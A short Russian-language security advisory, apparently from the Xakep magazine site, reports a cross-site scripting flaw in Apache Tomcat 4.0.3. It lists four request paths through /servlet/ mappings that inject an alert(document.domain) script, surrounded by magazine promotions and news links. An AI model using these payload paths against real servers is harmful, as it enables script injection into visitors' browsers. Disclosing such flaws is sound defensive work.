Межсайтовый скриптинг в Apache Tomcat

Рекомендуем почитать:

Хакер #307. Угон сессий Windows

Содержание выпуска
Подписка на «Хакер»-60%

Apache Tomcat - servlet контейнер, который используется в
Java.

Используя отображения /servlet/ для вызова
различных servlets/classes, можно заставить Tomcat выполнить произвольный код сценария
(угловые скобки пропущены):

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.ContainerServlet/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.Context/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.Globals/ SCRIPTalert(document.domain)/SCRIPT

Уязвимость обнаружена в Apache Tomcat version 4.0.3.

Межсайтовый скриптинг в Apache Tomcat

Хакер #307. Угон сессий Windows

Подпишись на наc в Telegram!

Из рубрики «Взлом»

HTB MagicGardens. Эксплуатируем переполнение буфера и повышаем привилегии в Linux

Хакеры.RU. Глава 0х0E. Следующий уровень

File Inclusion и Path Traversal. Разбираем две базовые веб-уязвимости

Страж безопасности. Защищаем периметр при помощи Wazuh

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Приложение DeepSeek для iOS передает конфиденциальные данные без шифрования

Неудачная попытка блокировки фишинговой ссылки привела к масштабному сбою Cloudflare

Антидетект-браузер AdsPower взломали. У пользователей похитили криптовалюту

Доходы видеопиратов упали на 4,2%

В рамках защиты от буткита BlackLotus Microsoft выпустила PowerShell-скрипт